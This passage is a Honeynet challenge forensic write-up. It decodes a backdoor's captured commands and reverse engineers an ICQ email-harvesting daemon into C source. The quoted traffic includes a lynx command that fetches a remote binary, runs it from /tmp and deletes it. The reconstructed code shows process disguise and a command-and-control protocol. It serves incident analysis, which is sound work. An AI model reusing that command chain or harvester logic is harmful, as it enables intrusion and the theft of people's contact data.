Scan of the Month 22 Analysis by Matei Conovici
===============================================


1. Introduction
---------------

This is an analysis of the activities the attacker from the Reverse
Challenge in July (http://project.honeynet.org) performed on a
compromised system.

It is my fist entry for a SoTM challenge so please bear with me :)


2. Tools
--------

 - tcpdump
 - tcpflow
 - objdump
 - the decoder for backdoor NVP traffic
 - home-grown perl/c programs for annotating the binary disassembly


3. Analysis
-----------

3.1 NVP backdoor traffic analysis

First we begin by analysing the NVP backdoor traffic the attacker
generated. As known from the Reverse Challenge, the backdoor installed
is a server listening for commands sent using IP protocol 11
(NVP). The requests themselves come from spoofed IP addresses of other
compromised system, acting as relay for the attacker. Lets find out
what's going on.

void:~$ tcpdump -r snort-0718\@1401.log -w 00-NVP-traffic.log proto 11

The decoder was slightly modified to display some more
information. Protocol was decoded manually using the information in
the Reverse Challenge reports.

void:~$ decoder -p 00-NVP-traffic.log | less

src: 94.0.146.98
dst: 172.16.183.2
dir: handler->agent

00 02 01 CB AD 90 32 00 00 00 00 00 00 00 00 00

Comments:

Command 02: Initialization, handler address is 203.173.144.50
	
Ok, so the actual address of the handler is 203.173.144.50, we will
only look at those packets and ignore the other 8 fake addresses the
backdoor replies to.

----

src: 192.146.201.172
dst: 172.16.183.2
dir: handler->agent

00 03 67 72 65 70 20 2D 69 20 22 7A 6F 6E 65 22  ..grep -i "zone"
20 2F 65 74 63 2F 6E 61 6D 65 64 2E 63 6F 6E 66   /etc/named.conf
00

Comments:

Command 03: Execute command and return output (grep -i "zone"
/etc/named.conf).

----
src: 172.16.183.2
dst: 203.173.144.50
dir: agent->handler

67 03 7A 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E  g.zone "." {.zon
65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64  e "0.0.127.in-ad
64 72 2E 61 72 70 61 22 20 7B 0A 00              dr.arpa" {      

Comments:

Output was:
-----------------
zone "." {
zone "0.0.0.127.in-addr.arpa" {
-----------------

The attacker will not be very pleased. This machine is not really a
nameserver.

----

src: 172.16.183.2
dst: 203.173.144.50
dir: agent->handler

67 04 00 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E  g..one "." {.zon
65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64  e "0.0.127.in-ad
64 72 2E 61 72 70 61 22 20 7B 0A 00              dr.arpa" {

Comments:

This is the "continuation" of the first reply packet. Actually, it's
the same data.

----

src: 168.148.27.14
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
65 72 76 65 00                                   erve

Comments:

Command 07: Execute, do not send output (killall -9 ttserve)

kill the 'ttserve' process if it was already running. We will see
below that the binary which will be installed will be named ttserve.

----

src: 10.39.81.89
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
65 72 76 65 00                                   erve

Comments:

Repeat the kill command, maybe the first packet was lost.

----

src: 58.248.76.90
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75  erve ; lynx -sou
72 63 65 20 68 74 74 70 3A 2F 2F 32 31 36 2E 32  rce http://216.2
34 32 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F  42.103.2:8882/fo
6F 20 3E 20 2F 74 6D 70 2F 74 74 73 65 72 76 65  o > /tmp/ttserve
20 3B 20 63 68 6D 6F 64 20 37 35 35 20 2F 74 6D   ; chmod 755 /tm
70 2F 74 74 73 65 72 76 65 20 3B 20 63 64 20 2F  p/ttserve ; cd /
74 6D 70 20 3B 20 2E 2F 74 74 73 65 72 76 65 20  tmp ; ./ttserve 
3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F 74 74  ; rm -rf /tmp/tt
73 65 72 76 65 20 2E 2F 74 74 73 65 72 76 65 20  serve ./ttserve 
3B 00                                            ;

Comments:

Command 07: Execute command.

--
killall -9 ttserve
lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve
chmod 755 /tmp/ttserve
cd /tmp
./ttserve
rm -rf /tmp/ttserve ./ttserve
--

Here, the attacker downloads a 'foo' file as /tmp/ttserve and launches
it, then removes the file.

After being launched, the file can be safely removed from the
filesystem. Since it's running, the kernel will not actually remove
the file until it is released (when program exits), but it will no
longer be visible in the /tmp directory.

----

src: 218.209.145.27
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
74 74 73 65 72 76 65 3B 00                       ttserve;

Comments:

Command 07: execute command

--
killall -9 lynx
rm -rf /tmp/ttserve
--

After a while, if the download was not complete, kill lynx and remove
the partially downloaded file so it is not discovered.

----

src: 122.255.17.55
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
74 74 73 65 72 76 65 3B 00                       ttserve;

Comments:

Repeat same command, in case first packet was lost.

----

src: 26.44.146.84
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
74 74 73 65 72 76 65 3B 00                       ttserve;


Comments:

Yet again.


And ... this was it.

Looks like the only things the attacker was interested in were to a)
check if the machine is acting as a nameserver for interesting zones
and b) launch the foo executable he has downloaded.

Later, we will see that the address from which the file was downloaded
was his 'home base'.

Now, let's take a look at the downloaded file.


3.2 Analysis of 'foo'
---------------------

Amusingly, "someone" changed the contents of the snort log so that the
address 'foo' was downloaded from appears to be 11.11.11.11 instead of
216.242.103.2. Oh well :-)

The 'foo' file was extracted from the snort log using tcpflow:

void:~$ tcpflow -r snort-0718\@1401.log host 11.11.11.11 and port 8882

This will result in two files, each containing data sent by the two
endpoints of the tcp connection. We are interested in the data in
011.011.011.011.08882-172.016.183.002.01025.

void:~$ less 011.011.011.011.08882-172.016.183.002.01025
HTTP/1.1 200 OK
Server: Foobarcatdog1
Content-type: text/x-csrc
Content-length: 215464
Accept-Ranges: bytes

^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@<90><80>^4^@^@^@<A0>G^C^@^@^@^@^@4


OK, so it's an ELF binary, 215464 bytes in length. After editing the
file and removing the HTTP reply headers, we're left with the binary
itself.

void:~$ file foo-binary
foo-binary: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

What to do know? I've decided I'm not going to take the chance to run
the file, even in a restricted environment but reverse engineer it
instead.

Running 'strings' on it reveals some interesting stuff, part of which
is:

void:~$ strings foo-binary | grep library
@(#) The Linux C library 5.3.12

Aha, so its built on the same system the backdoor was. Nice...

I've used a technique learned from some reverse challenge reports to
obtain the library function addresses. I've downloaded this version of
the library and unpacked libc.a, obtaining its object files.

First, I've obtained the list of 'call' addresses in the disassembly.

void:~$ objdump -d foo-binary | grep 'call   0x' | cut -f2 -dx | sort
| uniq >routines.txt 

There are 378 unique addresses called.

I wrote a small C program to linearly search the .text section of the
library object files in the foo binary. The program would replace
relocations in the object files with 0xFF and these bytes will be
ignored when looking for matches. If a match is found, each symbol in
the .text section of the object file will be output as:

    foo_text_start + foo_match_offset + symbol_offset_in_object 

where:
	foo_text_start
		virtual memory address of foo's .text section
	foo_match_offset
		start of object .text section in foo .text section
	symbol_offset_in_object
		symbols' offset in the .text section of the library
		object file.

void:~$ ./matchfunctions -a -r routines.txt -d objects.txt -b 
foo-binary >libcalls.txt

objects.txt is a file containing the paths to each object file in the
library. The '-a' switch is used to generate a 'libmatches.txt' file
where ALL matching library objects' symbols are emited.

void:~$ cut -f1 -d: libcalls.txt | sort | uniq | wc -l

tells me 276 of the 378 calls were found to be library calls. This
leaves 102 unresolved addresses. Most of these must be
intra-library calls.

Let's see which are the unresolved symbols.

Time to look at the annotated disassembly of foo. I wrote a small perl
script to annotate each 'call' instruction with the library function
name, if a match exists, or '<??>' if none was found.

void:~$ objdump -d foo-binary >disassemble
void:~$ annotate.pl disassemble | grep '??' | cut -f2 -dx | cut -f1 -d"  " | sort | uniq >calls.txt

To remove intra-library calls, I looked for the lowest symbol address
of the library. 

void:~$ sort libmatches.txt | head -1
080489e0: isalnum

void:~$ sort calls.txt | less
600cef30
8048080
8048110
8048134
8048258
80482b8
8048300
8048318
8048384
804841c
8048670
80489a8
8048b40
...

So, everything starting after 0x080489a8 is library code, not
interesting. This set is much more manageable. 

0x600cef30 looks like bad disassembly so we take that out.

void:~$ less disassemble-annotated.s
08048080 <.init>:
 8048080:       e8 93 c9 02 00          call   0x8074a18                < ?? >
 8048085:       c2 00 00                ret    $0x0

[...]

08074a40 <.fini>:
 8074a40:       e8 cb 36 fd ff          call   0x8048110                < ?? >
 8074a45:       c2 00 00                ret    $0x0


OK, we also take out 0x8048080 and 0x08048110, which is library initialization
and finalization code. This leaves us with:

0x08048134
0x08048258
0x080482b8
0x08048300
0x08048318
0x08048384
0x0804841c
0x08048670
0x080489a8

These 9 routines are the routines of the attackers program. I've
changed the annotate.pl script to read a second file (other than
library matches) to be able to assign names to these 9 functions as I
disassemble them and find out what they do.

First function is main() at 0x08048134, as can be seen at the
beginning of the disassembly:

 80480cf:       e8 6c bf 01 00          call   0x8064040                <__libc_init>
 80480d4:       68 40 4a 07 08          push   $0x8074a40
 80480d9:       e8 be d8 00 00          call   0x805599c                <atexit>
 80480de:       83 c4 04                add    $0x4,%esp
 80480e1:       e8 9a ff ff ff          call   0x8048080                < ?? >
 80480e6:       e8 49 00 00 00          call   0x8048134
 80480eb:       50                      push   %eax
 80480ec:       e8 5f d9 00 00          call   0x8055a50                <exit>
 80480f1:       5b                      pop    %ebx
 80480f2:       8d b4 26 00 00 00 00    lea    0x0(%esi,1),%esi
 80480f9:       8d b4 26 00 00 00 00    lea    0x0(%esi,1),%esi
 8048100:       b8 01 00 00 00          mov    $0x1,%eax

So we'll start with that.

 8048134:       55                      push   %ebp
 8048135:       89 e5                   mov    %esp,%ebp
 8048137:       81 ec 34 75 00 00       sub    $0x7534,%esp
 804813d:       c7 45 fc 00 00 00 00    movl   $0x0,0xfffffffc(%ebp)
 8048144:       68 30 75 00 00          push   $0x7530
 8048149:       6a 00                   push   $0x0
 804814b:       8d 85 cc 8a ff ff       lea    0xffff8acc(%ebp),%eax
 8048151:       50                      push   %eax
 8048152:       e8 2d c9 01 00          call   0x8064a84                <memset>

Disassembling this function and re-writing it into C code, it looks
like this:

int 
main(int argc, char **argv)
{
	int l1;
	char buffer[30000];

	l1 = 0;
	
	memset(buffer, 0, 30000);
	memset(argv[0], 0, strlen(argv[0]));
	
	strcpy(argv[0], "(nfsiod)");

	signal(SIGCHLD, SIG_IGN);

	/* parent exits after fork() */
	if (fork() != 0)
	   exit(0);

	/* become session leader */
	setsid();

	signal(SIGCHLD, SIG_IGN);

	/* this is usually 'daemon' */
	setuid(1);
	seteuid(1);

	/* parent exits after fork() */
	if (fork() != 0)
	   exit(0);

	signal(SIGPIPE, SIG_IGN);
	chdir("/");
	signal(SIGCHLD, SIG_IGN);

	while (1) {
	      l1 = function1(l1, buffer);		/* 0x0804841c */
	      
	      function2(l1, buffer, 30000);		/* 0x08048670 */

	      sleep(1);
	}
}

The code is "a bit" naive, but what it tries to do is daemonize
and hide itself by rewriting its command-line, so it appears this is a
system process at 'ps' (nfsiod, running as user daemon).

It seems that the actual work is performed in function1() and
function2(), so we're going to leave those and take a look at the
other 6 functions.

 8048258:       55                      push   %ebp
 8048259:       89 e5                   mov    %esp,%ebp
 804825b:       83 ec 08                sub    $0x8,%esp
 804825e:       8b 45 08                mov    0x8(%ebp),%eax
 8048261:       50                      push   %eax
 8048262:       e8 71 32 00 00          call   0x804b4d8                <inet_addr>
 8048267:       83 c4 04                add    $0x4,%esp
 804826a:       89 c0                   mov    %eax,%eax
 804826c:       89 c2                   mov    %eax,%edx
 804826e:       89 55 fc                mov    %edx,0xfffffffc(%ebp)
 8048271:       83 fa ff                cmp    $0xffffffff,%edx
 8048274:       75 39                   jne    0x80482af
 8048276:       8b 45 08                mov    0x8(%ebp),%eax
 8048279:       50                      push   %eax
 804827a:       e8 4d 23 00 00          call   0x804a5cc		<gethostbyname>
 804827f:       83 c4 04                add    $0x4,%esp
 8048282:       89 c0                   mov    %eax,%eax
 8048284:       89 45 f8                mov    %eax,0xfffffff8(%ebp)
 8048287:       83 7d f8 00             cmpl   $0x0,0xfffffff8(%ebp)
 804828b:       75 0b                   jne    0x8048298
 804828d:       6a 00                   push   $0x0
 804828f:       e8 bc d7 00 00          call   0x8055a50                <exit>
 8048294:       83 c4 04                add    $0x4,%esp
 8048297:       90                      nop    
 8048298:       6a 04                   push   $0x4
 804829a:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 804829d:       50                      push   %eax
 804829e:       8b 45 f8                mov    0xfffffff8(%ebp),%eax
 80482a1:       8b 50 10                mov    0x10(%eax),%edx
 80482a4:       8b 02                   mov    (%edx),%eax
 80482a6:       50                      push   %eax
 80482a7:       e8 3c b6 01 00          call   0x80638e8                <bcopy>
 80482ac:       83 c4 0c                add    $0xc,%esp
 80482af:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80482b2:       eb 00                   jmp    0x80482b4
 80482b4:       89 ec                   mov    %ebp,%esp
 80482b6:       5d                      pop    %ebp
 80482b7:       c3                      ret    

This is a helper routine, to obtain an IP address out of a string
representation of either an IP address or a host name. Seems the
attacker doesn't know gethostbyname() already does that.

Re-written into C, this routine looks something like this:

unsigned int
ip_address(char *name) 
{
	unsigned int ip;
	struct hostent *he;

	ip = inet_addr(name);
	if (ip != ~0L)
	   return ip;

	he = gethostbyname(name);
	if (!he)
	   exit(0);

	bcopy(he->h_addr, &ip, 4);
	return ip;
}

Lets look at the next function, at 0x080482b8.

 80482b8:       55                      push   %ebp
 80482b9:       89 e5                   mov    %esp,%ebp
 80482bb:       83 ec 04                sub    $0x4,%esp
 80482be:       6a 11                   push   $0x11
 80482c0:       6a 02                   push   $0x2
 80482c2:       6a 02                   push   $0x2
 80482c4:       e8 27 bd 01 00          call   0x8063ff0                <socket>
 80482c9:       83 c4 0c                add    $0xc,%esp
 80482cc:       89 c0                   mov    %eax,%eax
 80482ce:       89 45 fc                mov    %eax,0xfffffffc(%ebp)
 80482d1:       83 7d fc 00             cmpl   $0x0,0xfffffffc(%ebp)
 80482d5:       75 0d                   jne    0x80482e4
 80482d7:       6a 00                   push   $0x0
 80482d9:       e8 72 d7 00 00          call   0x8055a50                <exit>
 80482de:       83 c4 04                add    $0x4,%esp
 80482e1:       8d 76 00                lea    0x0(%esi),%esi
 80482e4:       68 00 08 00 00          push   $0x800
 80482e9:       6a 04                   push   $0x4
 80482eb:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80482ee:       50                      push   %eax
 80482ef:       e8 94 c1 01 00          call   0x8064488                <fcntl>
 80482f4:       83 c4 0c                add    $0xc,%esp
 80482f7:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80482fa:       eb 00                   jmp    0x80482fc
 80482fc:       89 ec                   mov    %ebp,%esp
 80482fe:       5d                      pop    %ebp
 80482ff:       c3                      ret    

Re-writing this back into C, this function looks like this:

int
nblk_udp_socket()
{
	int sock;

	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	if (sock == 0)
	   exit(0);

	fcntl(sock, F_SETFL, O_NONBLOCK);

	return sock;
}

Ok, so this function creates a non-blocking UDP socket. The check on
the return value of socket() is wrong, socket() returns -1 on error.

Next function is at 0x08048300.

 8048300:       55                      push   %ebp
 8048301:       89 e5                   mov    %esp,%ebp
 8048303:       8b 45 08                mov    0x8(%ebp),%eax
 8048306:       50                      push   %eax
 8048307:       e8 50 c1 01 00          call   0x806445c                <close>
 804830c:       83 c4 04                add    $0x4,%esp
 804830f:       31 c0                   xor    %eax,%eax
 8048311:       eb 01                   jmp    0x8048314
 8048313:       90                      nop    
 8048314:       89 ec                   mov    %ebp,%esp
 8048316:       5d                      pop    %ebp
 8048317:       c3                      ret    

This is a function that proves to be very useful :-) It is a
much-required-for wrapper around close(). We'll call it fd_close().

void
fd_close(int fd)
{
	close(fd);
}

Next function, at 0x08048318:


 8048318:       55                      push   %ebp
 8048319:       89 e5                   mov    %esp,%ebp
 804831b:       83 ec 10                sub    $0x10,%esp
 804831e:       83 7d 08 00             cmpl   $0x0,0x8(%ebp)
 8048322:       74 58                   je     0x804837c
 8048324:       6a 10                   push   $0x10
 8048326:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 8048329:       50                      push   %eax
 804832a:       e8 65 c5 01 00          call   0x8064894                <bzero>
 804832f:       83 c4 08                add    $0x8,%esp
 8048332:       68 53 4a 07 08          push   $0x8074a53
 8048337:       e8 1c ff ff ff          call   0x8048258                <ip_address>
 804833c:       83 c4 04                add    $0x4,%esp
 804833f:       89 c0                   mov    %eax,%eax
 8048341:       89 45 f4                mov    %eax,0xfffffff4(%ebp)
 8048344:       66 c7 45 f0 02 00       movw   $0x2,0xfffffff0(%ebp)
 804834a:       66 c7 45 f2 d0 a5       movw   $0xa5d0,0xfffffff2(%ebp)
 8048350:       6a 10                   push   $0x10
 8048352:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 8048355:       50                      push   %eax
 8048356:       6a 00                   push   $0x0
 8048358:       8b 45 10                mov    0x10(%ebp),%eax
 804835b:       50                      push   %eax
 804835c:       8b 45 0c                mov    0xc(%ebp),%eax
 804835f:       50                      push   %eax
 8048360:       8b 45 08                mov    0x8(%ebp),%eax
 8048363:       50                      push   %eax
 8048364:       e8 27 bc 01 00          call   0x8063f90                <sendto>
 8048369:       83 c4 18                add    $0x18,%esp
 804836c:       89 c0                   mov    %eax,%eax
 804836e:       85 c0                   test   %eax,%eax
 8048370:       7d 0a                   jge    0x804837c
 8048372:       6a 00                   push   $0x0
 8048374:       e8 d7 d6 00 00          call   0x8055a50                <exit>
 8048379:       83 c4 04                add    $0x4,%esp
 804837c:       31 c0                   xor    %eax,%eax
 804837e:       eb 00                   jmp    0x8048380
 8048380:       89 ec                   mov    %ebp,%esp
 8048382:       5d                      pop    %ebp
 8048383:       c3                      ret    

Let's translate this into C:

void
send_home_message(int sock, char *buffer, int len)
{
	struct sockaddr_in saddr;

	bzero(&saddr, sizeof(struct sockaddr_in));

	saddr.sin_addr.s_addr = ip_address("216.242.103.2");
	saddr.sin_family = AF_INET;
	saddr.sin_port   = 42448; /* htons(53413) */

	if (sendto(sock, buffer, len, 0, (struct sockaddr *) & saddr,
					 sizeof(struct sockaddr_in)) < 0)
			 exit(0);

}

This routine sends some data to the mother ship :-)

Next routine is at 0x08048384.

 8048384:       55                      push   %ebp
 8048385:       89 e5                   mov    %esp,%ebp
 8048387:       83 ec 18                sub    $0x18,%esp
 804838a:       c7 45 ec 10 00 00 00    movl   $0x10,0xffffffec(%ebp)
 8048391:       c7 45 e8 00 00 00 00    movl   $0x0,0xffffffe8(%ebp)
 8048398:       8b 45 10                mov    0x10(%ebp),%eax
 804839b:       50                      push   %eax
 804839c:       8b 45 0c                mov    0xc(%ebp),%eax
 804839f:       50                      push   %eax
 80483a0:       e8 ef c4 01 00          call   0x8064894                <bzero>
 80483a5:       83 c4 08                add    $0x8,%esp
 80483a8:       83 7d 08 00             cmpl   $0x0,0x8(%ebp)
 80483ac:       74 66                   je     0x8048414
 80483ae:       6a 10                   push   $0x10
 80483b0:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 80483b3:       50                      push   %eax
 80483b4:       e8 db c4 01 00          call   0x8064894                <bzero>
 80483b9:       83 c4 08                add    $0x8,%esp
 80483bc:       68 53 4a 07 08          push   $0x8074a53
 80483c1:       e8 92 fe ff ff          call   0x8048258                <ip_address>
 80483c6:       83 c4 04                add    $0x4,%esp
 80483c9:       89 c0                   mov    %eax,%eax
 80483cb:       89 45 f4                mov    %eax,0xfffffff4(%ebp)
 80483ce:       66 c7 45 f0 02 00       movw   $0x2,0xfffffff0(%ebp)
 80483d4:       66 c7 45 f2 d0 a5       movw   $0xa5d0,0xfffffff2(%ebp)
 80483da:       8d 45 ec                lea    0xffffffec(%ebp),%eax
 80483dd:       50                      push   %eax
 80483de:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 80483e1:       50                      push   %eax
 80483e2:       6a 00                   push   $0x0
 80483e4:       8b 45 10                mov    0x10(%ebp),%eax
 80483e7:       50                      push   %eax
 80483e8:       8b 45 0c                mov    0xc(%ebp),%eax
 80483eb:       50                      push   %eax
 80483ec:       8b 45 08                mov    0x8(%ebp),%eax
 80483ef:       50                      push   %eax
 80483f0:       e8 ef ba 01 00          call   0x8063ee4                <recvfrom>
 80483f5:       83 c4 18                add    $0x18,%esp
 80483f8:       89 c0                   mov    %eax,%eax
 80483fa:       89 45 e8                mov    %eax,0xffffffe8(%ebp)
 80483fd:       83 7d e8 00             cmpl   $0x0,0xffffffe8(%ebp)
 8048401:       7d 09                   jge    0x804840c
 8048403:       31 c0                   xor    %eax,%eax
 8048405:       eb 11                   jmp    0x8048418
 8048407:       90                      nop    
 8048408:       eb 0a                   jmp    0x8048414
 804840a:       8d 36                   lea    (%esi),%esi
 804840c:       b8 01 00 00 00          mov    $0x1,%eax
 8048411:       eb 05                   jmp    0x8048418
 8048413:       90                      nop    
 8048414:       31 c0                   xor    %eax,%eax
 8048416:       eb 00                   jmp    0x8048418
 8048418:       89 ec                   mov    %ebp,%esp
 804841a:       5d                      pop    %ebp
 804841b:       c3                      ret


This looks like the inverse routine of send_home_message, we'll call
it recv_home_message.

int
recv_home_message(int sock, char *buffer, int len)
{
	struct sockaddr_in saddr;
	int slen;
	int nbytes;

	slen = sizeof(struct sockaddr_in);
	l1 = 0;

	bzero(buffer, len);
	bzero(& saddr, sizeof(struct sockaddr_in));

	saddr.sin_addr.s_addr = ip_address("216.242.103.2");
	saddr.sin_family = AF_INET;
	saddr.sin_port   = 42448; /* htons(53413) */

	nbytes = recvfrom(sock, buffer, len, 0, (struct sockaddr *) & saddr, &slen);
	if (nbytes >= 0)
	   return 1;

	return 0;
}

The following two functions are rather long, because they actually
perform some work (these are the two routines called from main), so
we'll look at 0x080489a8.


 80489a8:       55                      push   %ebp
 80489a9:       89 e5                   mov    %esp,%ebp
 80489ab:       83 ec 04                sub    $0x4,%esp
 80489ae:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 80489b1:       50                      push   %eax
 80489b2:       68 1b 54 00 00          push   $0x541b
 80489b7:       8b 45 08                mov    0x8(%ebp),%eax
 80489ba:       50                      push   %eax
 80489bb:       e8 6c bb 01 00          call   0x806452c                <ioctl>
 80489c0:       83 c4 0c                add    $0xc,%esp
 80489c3:       89 c0                   mov    %eax,%eax
 80489c5:       83 f8 ff                cmp    $0xffffffff,%eax
 80489c8:       75 0a                   jne    0x80489d4
 80489ca:       b8 ff ff ff ff          mov    $0xffffffff,%eax
 80489cf:       eb 0b                   jmp    0x80489dc
 80489d1:       8d 76 00                lea    0x0(%esi),%esi
 80489d4:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80489d7:       eb 03                   jmp    0x80489dc
 80489d9:       8d 76 00                lea    0x0(%esi),%esi
 80489dc:       89 ec                   mov    %ebp,%esp
 80489de:       5d                      pop    %ebp
 80489df:       c3                      ret    

Put in plain C, this looks like:

int
bytes_avail(int sock)
{
	int res;

	if (ioctl(sock, FIONREAD, &res) == -1)
	   return -1;

	return res;
}

Now it's time to look at the two other functions. I will not quote the
disassembly here, but rather the translated C source. They don't look
very pretty but they're readable.

Two global variables seem to be used, one of which was declared static
(it's in the .bss section).

unsigned int start_uin;		/* 0x0807ad84 */
static int buf_len;		/* 0x08080f38 */

int
function1(int uin, char *retbuf)
{
	int sock, cnt;
	int l3;
	char buffer[1024];

	l3 = 1;

	/* return next UIN if this block was not
	   finished */
	if ((uin <= start_uin + 98) && (start_uin != 0))
	   return uin + 1;

	sock = nblk_udp_socket();

	/* this means we have something to send home */
	if (strlen(retbuf) > 3) {
	   
		/* try to send it until confirmation is received or
		   we timeout. Looks like there is a bug in the
		   handling of buf_len ?!
		 */
	   	while (l3) {
		        cnt = 0;

			retbuf[buf_len++] = '\0';

		        while (cnt <= 10) {
			    send_home_message(sock, retbuf, buf_len);

			    sleep(10);

			    cnt++;

			    if (recv_home_message(sock, buffer, 1000) > 0) {
				if (! strncmp(buffer, "GOT", 3)) {
				  l3 = 0;

				  break;
				}
			    }
			}

			if (cnt > 10)
			   exit(0);
		}
	}

	/* Request new block of UINs to collect */
	cnt = 0;

	while (cnt <= 10) {
	      send_home_message(sock, "GU\n", 3);

	      sleep(10);

	      cnt++;

	      if (recv_home_message(sock, buffer, 1000) > 0) {

	         /* maybe we're being asked to shut up */
		 if (! strncmp(buffer, "DIE", 3)) {
		    fd_close(sock);
		    exit(0);
		 }

		 /* ... or we receive new work */
		 if (! strncmp(buffer, "DU", 2)) {

		    /* 0x0804de0c, most likely sscanf */
		    sscanf(buffer + 2, "%lu", &start_uin);

		    memset(retbuf, 0, 30000);

		    /* 0x0804ddf4, identified as _IO_sscanf, but
		       rather it is sprintf */

		    sprintf(retbuf, "SE%lu\n", start_uin);

		    buf_len = strlen(retbuf);

		    fd_close(sock);

		    return start_uin;
		 }
	      }
	}

	fd_close(sock);
	exit(0);
}

void
function2(int uin, char *retbuf, int retsize)
{
	struct sockaddr_in saddr;
	int sock, cnt, run, state;
	char buffer[1024];
	char c1, c2;
	time_t req_sent;

	run = 1;
	state = 0;

	c1 = ' ';
	req_sent = 0;

	saddr.sin_addr.s_addr = ip_address("web.icq.com");
	saddr.sin_family = AF_INET;
	saddr.sin_port   = htons(80);

	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (connect(sock, (struct sockaddr *) & saddr, 
			  sizeof(struct	sockaddr_in)) == -1) {

		      close(sock);
		      return;
	}

	sleep(1);

	fcntl(sock, F_SETFL, O_NONBLOCK);

	sprintf(buffer, "GET /wwp?Uin=%lu HTTP/1.0\r\nHost: web.icq.com\r\n\r\n", uin);

	send(sock, buffer, strlen(buffer), 0);

	req_sent = time(NULL);

	while (run) {

	      if (time(NULL) - req_sent > 25)
		 run = 0;

	      if (! bytes_avail(sock))
		 continue;

	      cnt = read(sock, &c2, 1);

	      if (cnt != 1)
		 continue;

	      /* state is like this:

		 0 - look for '"'
		 1 - inside quotes, check if this is a mailto (state 2),
		     otherwise go back in state 0
		 2 - copy email address until quote is found or buffer
		     runs out
	       */
		 
	      if (state == 0) {

		 if (c2 == '"')
		    state = 1;

	      } else if (state == 1) {
		
		if ((c1 == '"') && (c2 != 'm'))
		   state = 0;

		if ((c1 == 'm') && (c2 != 'a'))
		   state = 0;

		if ((c1 == 'a') && (c2 != 'i'))
		   state = 0;

		if ((c1 == 'i') && (c2 != 'l'))
		   state = 0;

		if ((c1 == 'l') && (c2 != 't'))
		   state = 0;

		if ((c1 == 't') && (c2 != 'o'))
		   state = 0;

		if ((c1 == 'o') && (c2 != ':'))
		   state = 0;

		/* found "mailto:, go to state 2 */

		state = 2;

	      } else if (state == 2) {

		 if (buf_len > retsize - 1) {
		    close(sock);
		    sleep(1);
		 }

		 if (c2 == '"') {
		    retbuf[buf_len++] = '\n';
		    close(sock);
		    sleep(1);
		    return;
		 }

		 if (isprint(c2))
		    retbuf[buf_len++] = c2;
	      }

	      /* save last char */
	      c1 = c2;
	}

	close(sock);
}

By now, the purpose of the program is quite clear. It will connect to
the home address of the attacker, using udp on port 53413 and say
hello ("GU"). There are two possible answers to this greeting. One is
"DIE", which instructs the program to exit and the other is "DUxxxxxx"
where xxxxx is a decimal number.

The number following the "DU" string is the start of a block of 100
ICQ user IDs whose profiles will be harvested for email addresses. 

function1 is responsible for communication with attacker's home
machine and setting up the next ICQ id to probe, while function2
retrieves the profile, looks for the string '"mailto:' and copies the
email address in the large buffer (30000 bytes) allocated in the main
function. Email addresses are separated by newline.

When 100 user IDs have been harvested, the result is sent home. The
buffer looks something like:

SExxxxxxxx    <---- this is the start of the block
email1@email.com
email2@email.com
...

etc

After sending this buffer, the foo program will expect confirmation
from the home machine, which consists of a packet containing the "GOT"
acknowledgment. If the acknowledgment is received, the program will
send the "GU" greeting again and wait for more instructions (DIE or
DUxxxxx).

Let's take a look at the snort log again. First, let's get out the
connections to the ICQ webservers (205.188.248.25, 205.188.248.57,
205.188.248.89).

(03-no-foo-download.log contains all traffic except NVP backdoor
traffic and the download of the foo file)

void:~$ tcpdump -r 03-no-foo-download.log -w 05-no-icq.log host not 
web.icq.com

Let's examine home communication:

void:~$ tcpdump -r 05-no-icq.log -X udp and port 53413

22:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413:  udp 3
0x0000   4500 001f 00c9 0000 4011 d6fd ac10 b702        E.......@.......
0x0010   0b0b 0b0b 0401 d0a5 000b 36d4 4755 0a          ..........6.GU.

22:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025:  udp 10
0x0000   4500 0026 0363 0000 3511 df5c 0b0b 0b0b        E..&.c..5..\....
0x0010   ac10 b702 d0a5 0401 0012 7922 4455 3932        ..........y"DU92
0x0020   3037 3130 300a                                 07100.

Hmm, only two packets. The first is the "GU\n" greeting from the
program to the home machine, the second is from the home machine and
instructs the program to start harvesting from ICQ ID 9207100.

Looking at the number of flows to the ICQ server we can find all 100
